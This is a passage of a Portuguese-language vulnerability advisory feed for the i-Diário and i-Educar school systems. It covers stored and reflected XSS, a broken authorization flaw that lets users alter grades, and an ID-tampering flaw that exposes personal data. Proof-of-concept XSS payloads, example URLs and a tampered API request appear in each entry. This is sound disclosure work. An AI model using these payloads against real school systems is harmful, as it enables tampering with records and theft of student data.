maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8787/image.png" width="1478" height="1024" srcset="/p/cve-2025-8787/image_hu_af95e2fb9a2d3cce.png 480w, /p/cve-2025-8787/image_hu_71862e9971386bbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="144" data-flex-basis="346px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8788/ https://www.cvehunters.com/pt/p/cve-2025-8788/ <h2 id="cve-2025-8788-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aula-por-areas-de-conhecimentoid">CVE-2025-8788: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8788" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8788</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code></p><h2 id="cve-2025-8788-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-planos-de-aula-por-areas-de-conhecimentoid">CVE-2025-8788: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8788" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8788</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code></p> <p>Parâmetros:<code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Parecer</code>, <code>Conteúdos</code> e <code>Objetivos</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8788/image.png" width="1038" height="848" srcset="/p/cve-2025-8788/image_hu_9b8b7d2a254f8182.png 480w, /p/cve-2025-8788/image_hu_650bf2e02f0977a4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="122" data-flex-basis="293px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8789/ https://www.cvehunters.com/pt/p/cve-2025-8789/ <h2 id="cve-2025-8789-broken-function-level-authorization-bfla-permite-que-usuários-não-autorizados-alterem-as-notas-dos-alunos">CVE-2025-8789: Broken Function Level Authorization (BFLA) permite que usuários não autorizados alterem as notas dos alunos </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8789</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um endpoint de API no i-Educar 2.9.0 é vulnerável à Broken Function Level Authorization (BFLA). Um usuário não autorizado consegue modificar as notas dos alunos acessando diretamente o endpoint <code>/module/Api/Diario</code>, ignorando os controles de permissão. Isso leva a sérios problemas de integridade, em que qualquer pessoa com acesso ao formato da API pode adulterar registros acadêmicos.</p><h2 id="cve-2025-8789-broken-function-level-authorization-bfla-permite-que-usuários-não-autorizados-alterem-as-notas-dos-alunos">CVE-2025-8789: Broken Function Level Authorization (BFLA) permite que usuários não autorizados alterem as notas dos alunos </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8789</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um endpoint de API no i-Educar 2.9.0 é vulnerável à Broken Function Level Authorization (BFLA). Um usuário não autorizado consegue modificar as notas dos alunos acessando diretamente o endpoint <code>/module/Api/Diario</code>, ignorando os controles de permissão. Isso leva a sérios problemas de integridade, em que qualquer pessoa com acesso ao formato da API pode adulterar registros acadêmicos.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O endpoint <code>/module/Api/Diario</code> não aplica verificações de autorização adequadas para validar se o usuário que efetuou a chamada tem o direito de alterar as notas dos alunos. Mesmo um usuário sem nenhum perfil ou permissões atribuídas pode enviar uma solicitação e alterar as notas dos alunos no sistema com sucesso. Não há validação de funções de sessão ou permissões associadas antes da execução de ações acadêmicas confidenciais. <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>1 - Criar um novo usuário sem privilégios:</li></ul></p> <p><img src="/p/cve-2025-8789/image.png" width="1265" height="845" srcset="/p/cve-2025-8789/image_hu_12fb6a5884d4c7fe.png 480w, /p/cve-2025-8789/image_hu_1cd7def43b89cd3b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="149" data-flex-basis="359px" /></p> <p style="text-align: justify;"><ul><li>2 - Preparar uma solicitação para o endpoint <code>/module/Api/Diario</code> com os dados para enviar a nota de um aluno, usando o cookie de usuário com privilégios baixos e, em seguida, enviar a solicitação:</li></ul></p> <p><img src="/p/cve-2025-8789/image-1.png" width="1907" height="706" srcset="/p/cve-2025-8789/image-1_hu_4233548f4a00bb09.png 480w, /p/cve-2025-8789/image-1_hu_e6aa64e535ea83af.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="270" data-flex-basis="648px" /></p> <p>Resultado traduzido de pt-br para en:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="s2">"oper"</span><span class="o">:</span> <span class="s2">"post"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"resource"</span><span class="o">:</span> <span class="s2">"grades"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"msgs"</span><span class="o">:</span> <span class="p">[{</span> </span></span><span class="line"><span class="cl"><span class="s2">"msg"</span><span class="o">:</span> <span class="s2">"Notas publicadas com sucesso!"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"><span class="s2">"type"</span><span class="o">:</span> <span class="s2">"success"</span> </span></span><span class="line"><span class="cl"><span class="p">}],</span> </span></span><span class="line"><span class="cl"><span class="s2">"any_error_msg"</span><span class="o">:</span> <span class="kc">false</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta é uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem: <ul> <li>Adulteração de dados acadêmicos sem autorização.</li> <li>Perda da integridade dos dados em registros escolares.</li> <li>Possíveis danos legais e à reputação de instituições educacionais.</li> </ul> </p> <h2 id="referência">Referência </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md</a></strong></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8790/ https://www.cvehunters.com/pt/p/cve-2025-8790/ <h2 id="cve-2025-8790-broken-object-level-authorization-bola-permite-acesso-não-autorizado-a-dados-de-outros-usuários">CVE-2025-8790: Broken Object Level Authorization (BOLA) permite acesso não autorizado a dados de outros usuários </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8790" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8790</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada na API do i-educar 2.8 e 2.9, permitindo que qualquer usuário autenticado com privilégios baixos acesse informações confidenciais de outros usuários manipulando o parâmetro <code>id</code> no endpoint de recurso <code>pessoa</code>.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O endpoint <code>/module/Api/pessoa</code> não possui verificações de autorização adequadas para garantir que o usuário autenticado só consiga acessar seus próprios dados.</br></br>Ao alterar o parâmetro id na solicitação a seguir, qualquer usuário autenticado pode recuperar informações sobre outros usuários:</br></br><code>GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1</code></p><h2 id="cve-2025-8790-broken-object-level-authorization-bola-permite-acesso-não-autorizado-a-dados-de-outros-usuários">CVE-2025-8790: Broken Object Level Authorization (BOLA) permite acesso não autorizado a dados de outros usuários </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8790" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8790</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada na API do i-educar 2.8 e 2.9, permitindo que qualquer usuário autenticado com privilégios baixos acesse informações confidenciais de outros usuários manipulando o parâmetro <code>id</code> no endpoint de recurso <code>pessoa</code>.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O endpoint <code>/module/Api/pessoa</code> não possui verificações de autorização adequadas para garantir que o usuário autenticado só consiga acessar seus próprios dados.</br></br>Ao alterar o parâmetro id na solicitação a seguir, qualquer usuário autenticado pode recuperar informações sobre outros usuários:</br></br><code>GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1</code></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>1. Autentique-se como um usuário sem privilégios (por exemplo, aluno, professor).</li></ul></p> <p><img src="/p/cve-2025-8790/image.png" width="1844" height="712" srcset="/p/cve-2025-8790/image_hu_48fc6d25edbda623.png 480w, /p/cve-2025-8790/image_hu_74ee304be9e6fa02.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="258" data-flex-basis="621px" /></p> <p style="text-align: justify;"><ul><li>2. Envie a seguinte solicitação direcionada ao usuário id=1:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=VALID_SESSION_COOKIE } </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8790/image-1.png" width="1692" height="722" srcset="/p/cve-2025-8790/image-1_hu_c84dc371c6bf6535.png 480w, /p/cve-2025-8790/image-1_hu_320efcd74fb43e61.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" /></p> <p style="text-align: justify;"><ul><li>3. Observe que os dados do usuário para id=1 são retornados, mesmo que o usuário logado não esteja autorizado a acessar esse perfil:</li></ul></p> <p><img src="/p/cve-2025-8790/image-2.png" width="340" height="205" srcset="/p/cve-2025-8790/image-2_hu_d9c8057967bbba47.png 480w, /p/cve-2025-8790/image-2_hu_ab2516e3d6f6df9a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="165" data-flex-basis="398px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados confidenciais. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a: <ul> <li>Acesso não autorizado a PII confidenciais;</li> <li>Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);</li> <li>Possível abuso de dados do usuário ou personificação;</li> <li>Enumeração de usuários.</li> </ul> </p> <h2 id="referência">Referência </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md</a></strong></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8784/ https://www.cvehunters.com/pt/p/cve-2025-8784/ <h2 id="cve-2025-8784-cross-site-scripting-xss-armazenado-no-endpoint-funcionario_vinculo_cadphp-parâmetro-nome">CVE-2025-8784: Cross-Site Scripting (XSS) Armazenado no endpoint <code>funcionario_vinculo_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8784" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8784</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>funcionario_vinculo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>funcionario_vinculo_cad.php</code></p><h2 id="cve-2025-8784-cross-site-scripting-xss-armazenado-no-endpoint-funcionario_vinculo_cadphp-parâmetro-nome">CVE-2025-8784: Cross-Site Scripting (XSS) Armazenado no endpoint <code>funcionario_vinculo_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8784" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8784</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>funcionario_vinculo_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>funcionario_vinculo_cad.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8784/image-1.png" width="816" height="785" srcset="/p/cve-2025-8784/image-1_hu_65d849fc4a441b59.png 480w, /p/cve-2025-8784/image-1_hu_8e8bc4b51d611da8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="103" data-flex-basis="249px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 09 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8785/ https://www.cvehunters.com/pt/p/cve-2025-8785/ <h2 id="cve-2025-8785-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_lstphp">CVE-2025-8785: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_usuario_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8785" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8785</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>educar_usuario_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_lst.php</code></p> <p>Parâmetros: <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8785-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_lstphp">CVE-2025-8785: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_usuario_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8785" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8785</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>educar_usuario_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_lst.php</code></p> <p>Parâmetros: <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_pessoa</code>, <code>matricula</code> e <code>matricula_interna</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8785/image.png" width="854" height="800" srcset="/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="106" data-flex-basis="256px" /></p> <h2 id="urls-de-exemplo">URLs de Exemplo: </h2><p><code>/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <p><code>/intranet/educar_usuario_lst.php?matricula=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <p><code>/intranet/educar_usuario_lst.php?matricula_interna=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E</code></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" 